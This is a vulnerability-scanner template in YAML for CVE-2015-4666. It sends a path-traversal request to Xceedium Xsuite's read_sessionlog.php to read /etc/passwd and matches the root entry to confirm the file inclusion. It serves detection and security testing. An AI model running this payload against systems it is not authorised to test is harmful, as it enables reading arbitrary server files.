36 lines
1.1 KiB
YAML
36 lines
1.1 KiB
YAML
id: CVE-2015-4666
|
|
|
|
info:
|
|
name: Xceedium Xsuite <=2.4.4.5 - Local File Inclusion
|
|
author: 0x_Akoko
|
|
severity: high
|
|
description: Xceedium Xsuite 2.4.4.5 and earlier is vulnerable to local file inclusion via opm/read_sessionlog.php that allows remote attackers to read arbitrary files in the logFile parameter.
|
|
reference:
|
|
- https://www.modzero.com/advisories/MZ-15-02-Xceedium-Xsuite.txt
|
|
- http://packetstormsecurity.com/files/132809/Xceedium-Xsuite-Command-Injection-XSS-Traversal-Escalation.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-4666
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2015-4666
|
|
cwe-id: CWE-22
|
|
tags: xceedium,xsuite,lfi,packetstorm,cve,cve2015
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/opm/read_sessionlog.php?logFile=....//....//....//....//etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/07/13
|